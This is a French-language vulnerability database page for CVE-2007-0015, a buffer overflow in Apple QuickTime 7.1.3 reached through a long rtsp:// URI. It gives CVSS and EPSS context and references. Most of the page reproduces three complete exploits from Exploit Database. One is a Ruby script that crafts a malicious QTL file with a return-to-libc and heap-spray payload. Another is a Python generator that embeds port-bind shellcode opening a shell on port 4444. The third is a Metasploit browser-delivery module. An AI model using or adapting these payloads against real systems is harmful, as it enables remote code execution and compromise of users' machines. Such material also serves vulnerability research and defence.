Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Buffer overflow in Apple QuickTime 7.1.3 allows remote attackers to execute arbitrary code via a long rtsp:// URI.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 3064
Date de publication : 2006-12-31 23h00 +00:00
Auteur : MoAB
EDB Vérifié : Yes
#!/usr/bin/ruby
# Copyright (c) LMH <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Notes:
# Our command string is loaded on memory at a static address normally,
# but this depends on execution method and the string length. The address set in this exploit will
# be likely successful if we open the resulting QTL file directly, without having an
# instance of Quicktime running. Although, when using another method and string, you'll need
# to find the address.
# For 100% reliable exploitation you can always use the /bin/sh address,
# but that's not as a cool as having your box welcoming the new year.
# Do whatever you prefer. That said, enjoy.
#
# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html
# Command string: Use whatever you like.
# Remember that changing this will also need a change of the target address for system(),
# unless string length is the same.
CMD_STRING = "/usr/bin/say Happy new year shit bag"
# Mac OS X 10.4.8 (8L2127)
EBP_ADDR = 0xdeadbabe
SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back
SETUID_ADDR = 0x900334f0
CURL_ADDR = 0x916c24bc # /usr/bin/curl
SHELL_ADDR = 0x918bef3a # /bin/sh
CMDSTR_ADDR = [
SHELL_ADDR, # 0 addr to static /bin/sh (lame)
0x17a053c, # 1 addr to our command string (cool) :> (change as necessary)
0xbabeface, # 2 bogus addr for testing.
CURL_ADDR # 3 addr to '/usr/bin/curl'
]
# Payload
HAPPY = ("A" * 299) +
[EBP_ADDR].pack("V") +
[SYSTEM_ADDR].pack("V") +
[SETUID_ADDR].pack("V") +
[CMDSTR_ADDR[1]].pack("V") # change array index for using diff. addr
# Sleds: not necessary if using /bin/bash addr or other built-in addresses.
# although, for using our own fu, we need to spray some data for better reliability
# the goal is causing allocation of large heap chunks
NEW = ("\x90" * 30000) + CMD_STRING # feed the heap
YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go
APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more
BOYZ = ("\x90" * 30000) + "FOOM" # and more
# QTL output template
QTL_CONTENT = "<?xml version=\"1.0\"?>" +
"<?quicktime type=\"application/x-quicktime-media-link\"?>" +
"<embed autoplay=\"true\" moviename=\"#{NEW}\" " +
"qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " +
"src=\"rtsp://#{BOYZ}:#{HAPPY}\" />\n"
target_file = File.open("pwnage.qtl", "w+") { |f|
f.print(QTL_CONTENT)
f.close
}
# milw0rm.com [2007-01-01]
Exploit Database EDB-ID : 3072
Date de publication : 2007-01-02 23h00 +00:00
Auteur : Winny Thomas
EDB Vérifié : Yes
#!/usr/bin/python
#Port bind exploit for apple quicktime rtsp vulnerability
#Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy
#to port the exploit to others. All one needs to do is look for the appropriate
#jump address. Certain characters are not permitted in the shellcode.
#Alphanumeric shellcodes work fine.
#This script creates a qtl file which when clicked upon binds a shell to TCP
#port 4444. This file can be delivered through several means; HTTP, SMTP etc
#
# Winny Thomas ;-)
# Author shall bear no responsibility for any kind of screws up caused by using
# this code
import sys
#alpha numeric port bind shellcode from metasploit; binds shell to port 4444
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57"
shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38"
shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58"
shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48"
shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54"
shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d"
shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38"
shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56"
shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57"
shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e"
shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30"
shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34"
shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41"
shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a"
shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d"
shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56"
shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46"
shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c"
shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c"
shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32"
shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36"
shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56"
shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
shellcode += "\x4f\x4f\x42\x4d\x5a\x90"
shellcode += "\x90" * 90
def CreateQTL(sp):
if sp == "1":
JMPedi = '\xf5\x0c\xe5\x77' #Address of jmp edi from user32.dll
elif sp == "2":
JMPedi = '\x34\xd9\xe4\x77' #Address of jmp edi from user32.dll
else:
print 'Unsupported Service pack number'
sys.exit(-1)
#XML template from http://www.milw0rm.org/exploits/3064
QTL = "<?xml version=\"1.0\"?>"
QTL += "<?quicktime type=\"application/x-quicktime-media-link\"?>"
QTL += "<embed autoplay=\"true\" moviename=\"#{NEW}\" "
QTL += "qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" "
QTL += "src=\"rtsp://" + '\x90'*200 + shellcode + '\x90'*9000 + ':' + '\x90'*811 + JMPedi
QTL += "\" />\n"
fd = open('./exp.qtl', 'w')
fd.write(QTL)
fd.close()
if __name__ == '__main__':
try:
sp = sys.argv[1]
except IndexError:
print 'Usage: %s <version number>\n' % sys.argv[0]
print 'Version: 1 => windows 2000 server SP0'
print 'Version: 2 => windows 2000 server SP4'
sys.exit(-1)
CreateQTL(sp)
# milw0rm.com [2007-01-03]
Exploit Database EDB-ID : 16527
Date de publication : 2010-05-03 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: apple_quicktime_rtsp.rb 9220 2010-05-04 23:09:32Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking, # reliable memory corruption
:vuln_test => nil,
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Apple QuickTime
7.1.3. This module was inspired by MOAB-01-01-2007. The
Browser target for this module was tested against IE 6 and
Firefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the
QuickTime plugin.
},
'Author' => [ 'MC', 'egypt' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9220 $',
'References' =>
[
[ 'CVE', '2007-0015' ],
[ 'OSVDB', '31023'],
[ 'BID', '21829' ],
[ 'URL', 'http://projects.info-pull.com/moab/MOAB-01-01-2007.html' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Apple QuickTime Player 7.1.3',
{
'Ret' => 0x6855d8a2 # xpsp2/2k3 :( | vista ;)
}
],
[ 'Browser Universal',
{
'Ret' => 0x0c0c0c0c # tested on xpsp0 and sp2
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Jan 1 2007',
'DefaultTarget' => 0))
end
def on_request_uri(client, request)
return if ((p = regenerate_payload(client)) == nil)
if (target.name =~ /Automatic/)
if (request['User-Agent'] =~ /QuickTime/i)
target = targets[1]
else
target = targets[2]
end
end
cruft = rand_text_alphanumeric(4)
# This is all basically filler on the browser target because we can't
# expect the SEH to be in a reliable place across multiple browsers.
# Heap spray ftw.
sploit = rand_text_english(307)
sploit << p.encoded + "\xeb\x06" + rand_text_english(2)
sploit << [target.ret].pack('V') + [0xe8, -485].pack('CV')
if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.qtl$/)
print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...")
print_status("Trying target #{target.name}...")
content = build_qtl(sploit)
else
print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...")
shellcode = Rex::Text.to_unescape(p.encoded)
url = ((datastore['SSL']) ? "https://" : "http://")
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
url << ":" + datastore['SRVPORT']
url << get_resource
js = <<-ENDJS
#{js_heap_spray}
sprayHeap(unescape("#{shellcode}"), 0x#{target.ret.to_s 16}, 0x4000);
ENDJS
content = "<html><body><script><!--\n#{js}//--></script>"
content << <<-ENDEMBED
<OBJECT
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
WIDTH="1"
HEIGHT="1"
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
<PARAM name="SRC" VALUE = "#{url}/#{cruft}.qtl">
<PARAM name="QTSRC" VALUE = "#{url}/#{cruft}.qtl">
<PARAM name="AUTOPLAY" VALUE = "true" >
<PARAM name="TYPE" VALUE = "video/quicktime" >
<PARAM name="TARGET" VALUE = "myself" >
<EMBED
SRC = "#{url}/#{cruft}.qtl"
QTSRC = "#{url}/#{cruft}.qtl"
TARGET = "myself"
WIDTH = "1"
HEIGHT = "1"
AUTOPLAY = "true"
PLUGIN = "quicktimeplugin"
TYPE = "video/quicktime"
CACHE = "false"
PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
</EMBED>
</OBJECT>
ENDEMBED
content << "</body></html>"
end
send_response(client, content, { 'Content-Type' => "text/html" })
# Handle the payload
handler(client)
end
def build_qtl(overflow)
cruft = rand_text_english(4)
content = "<?xml version=\"1.0\"?>\n"
content << "<?quicktime type=\"application/x-quicktime-media-link\"?>\n"
content << "<embed autoplay=\"true\" \n"
content << "moviename=\"#{cruft}\" \n"
content << "qtnext=\"#{cruft}\" \n"
content << "type=\"video/quicktime\" \n"
content << "src=\"rtsp://#{cruft}:#{overflow}\" />\n"
end
end
Products Mentioned
Configuraton 0
Apple>>Quicktime >> Version 7.1.3
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
Références
http://lists.apple.com/archives/Security-announce/2007/Jan/msg00000.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
http://landonf.bikemonkey.org/code/macosx/MOAB_Day_1.20070102060815.15950.zadder.local.html
Tags : x_refsource_MISC
Tags : x_refsource_MISC
